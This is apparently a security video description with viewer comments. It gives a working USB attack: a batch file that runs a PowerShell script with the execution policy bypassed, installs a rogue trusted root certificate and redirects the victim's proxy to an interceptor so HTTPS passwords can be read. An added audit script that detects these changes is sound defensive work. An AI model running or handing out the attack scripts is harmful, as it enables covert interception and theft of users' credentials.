
In this episode of STÖK we run a simple PowerShell script from a USB drive that installs an ugly root CA certificate and at the same time reconfigures the victim's machine so that it browses through our proxy server in Azure. We then decrypt the SSL traffic with a Burp proxy and read passwords sent over HTTPS in plain text.
The attack uses Microsoft's own software, Kali Linux and Burp Proxy. Because the user is a local admin on the machine, the attack gets past all the protection mechanisms in under 1 second. What we do is nothing strange and is fully supported. The thing is that this is something that more and more large companies are using to get at hackers / ransomware. So they can read your passwords without you knowing it.
The victim computer is fully patched and runs both a third-party machine-learning antivirus / anti-malware solution and another third-party system that is supposed to block any unknown malicious code. The traffic passes through a SEK 150,000 firewall with both advanced application blocking and extended controls. Nuff said ..
We do this for research purposes because we HAVE to question the tools we as users sometimes blindly rely on, for example endpoint protection, a patched OS and expensive firewalls. Nothing is secure ..
— — securesurf.cmd
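@echo off
echo. invoke powershellbypassmagic ..
rem Pipe the script from the USB drive (d:) into Invoke-Expression with the execution policy bypassed
powershell.exe -ep Bypass "& {Get-Content d:\enableproxy_ca.ps1 | iex}"
echo. donated.
PAUSE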
— — enableproxy_ca.ps1
# Load the CA certificate from the USB drive (d:)
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2("d:\cacert.der")
# Add it to the machine-wide Trusted Root store (this is the step that needs local admin)
$rootStore = Get-Item cert:\LocalMachine\Root
$rootStore.Open("ReadWrite")
$rootStore.Add($cert)
$rootStore.Close()
# Point the current user's proxy settings at the intercepting proxy
$reg = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Set-ItemProperty -Path $reg -Name ProxyServer -Value "your ip / hostname goes here"
Set-ItemProperty -Path $reg -Name ProxyEnable -Value 1
Fredrik Alexandersson
Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution.
Burp or Burp Suite is a graphical tool for testing Web application security.
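A defender-side check for the two changes enableproxy_ca.ps1 makes (a new trusted root and an enabled user proxy), as an added example that is not part of the original video description. The parameter $ApprovedThumbprints and both function names are assumptions made for this example; run it elevated so that other users' loaded registry hives are readable.

```powershell
# Added example: host audit for the two changes enableproxy_ca.ps1 makes.
# Assumption: $ApprovedThumbprints is a hypothetical allow-list from a known-good build.
param([string[]]$ApprovedThumbprints = @())

function Get-UnapprovedRootCert {
    param([string[]]$Approved)
    # Roots added on this host through the store API are persisted under this key;
    # Group Policy and automatic root-update certificates are stored under other keys.
    $regKey = 'HKLM:\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates'
    $local  = @((Get-ChildItem -Path $regKey -ErrorAction SilentlyContinue).PSChildName)
    Get-ChildItem -Path Cert:\LocalMachine\Root |
        Where-Object { $Approved -notcontains $_.Thumbprint } |
        ForEach-Object {
            [pscustomobject]@{
                Thumbprint       = $_.Thumbprint
                Subject          = $_.Subject
                NotBefore        = $_.NotBefore
                LocallyInstalled = ($local -contains $_.Thumbprint)
            }
        }
}

function Get-UserProxySetting {
    # Inspect every loaded user hive, not only the account running the audit.
    $suffix = 'Software\Microsoft\Windows\CurrentVersion\Internet Settings'
    Get-ChildItem -Path Registry::HKEY_USERS -ErrorAction SilentlyContinue |
        ForEach-Object {
            $s = Get-ItemProperty -Path (Join-Path $_.PSPath $suffix) -ErrorAction SilentlyContinue
            if ($s -and $s.ProxyEnable -eq 1) {
                [pscustomobject]@{
                    UserSid     = $_.PSChildName
                    ProxyServer = $s.ProxyServer
                }
            }
        }
}

$roots   = @(Get-UnapprovedRootCert -Approved $ApprovedThumbprints)
$proxies = @(Get-UserProxySetting)
$roots   | Sort-Object NotBefore -Descending | Format-Table -AutoSize
$proxies | Format-Table -AutoSize

# With a baseline supplied, an unapproved root plus an enabled proxy is the
# combination this page's script leaves behind.
if ($ApprovedThumbprints.Count -gt 0 -and $roots.Count -gt 0 -and $proxies.Count -gt 0) {
    Write-Warning 'Unapproved root CA and an enabled user proxy are both present.'
}
```

Without a baseline the first table lists every trusted root, so the LocallyInstalled column is the one to review by hand.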
———— — –
If you also want to get that STÖK vibe, here's my gear,
–CAMERA / STUDIO GEAR–
PANASONIC LUMIX GH5 4K
Nikon D850
DJI Osmo Pocket
Nikon AF-S FX NIKKOR 50mm f / 1.4G
PANASONIC LUMIX 12-35mm Camera Lens G X VARIO II, F2.8
Red VideoMicro Compact
Tascam DR-70D 4-Track Portable Audio Recorder
Blackmagic Design UltraStudio Mini Recorder – Thunderbolt
–COMPUTER–
Apple MacBook Pro
Dell Precision M5510 WorkStation
Dell U3419w Ultrasharp 34-Inch Curved
Logitech MX Master 2S Wireless Mouse
Apple Magic Keyboard with Numeric Keypad
Logitech HD Pro Webcam C920
QNAP TVS-672XT 6 Bay Thunderbolt 3 NAS
–STUDIO LIGHTS–
Philips Hue Smart Hub
Philips Hue Single Premium Smart Bulb, 16 million colors,
Philips Hue Smart Dimmer Switch with Remote
Softbox Lighting Kit
————- –
LOVE LOVES:
Could you reupload and replace the audio in English or add caption subtitles please. Thank you.
Please add your video in English…
Please Add English Sub
Almost easier to peek over the boss's shoulder xD
please activate subtitles you crackhead. thanks
Does it work just as easily with Chrome on a Windows machine? 🤪
Can this be done but with a proxy set for all of Windows 10, so that Google Chrome, Firefox etc. are affected too? Awesome video btw!
Make videos in English… I love your channel.
Awesome studio
These videos are so daaamn awesome! How did you learn all this & what education do you have? Keep it up!
What language are you speaking?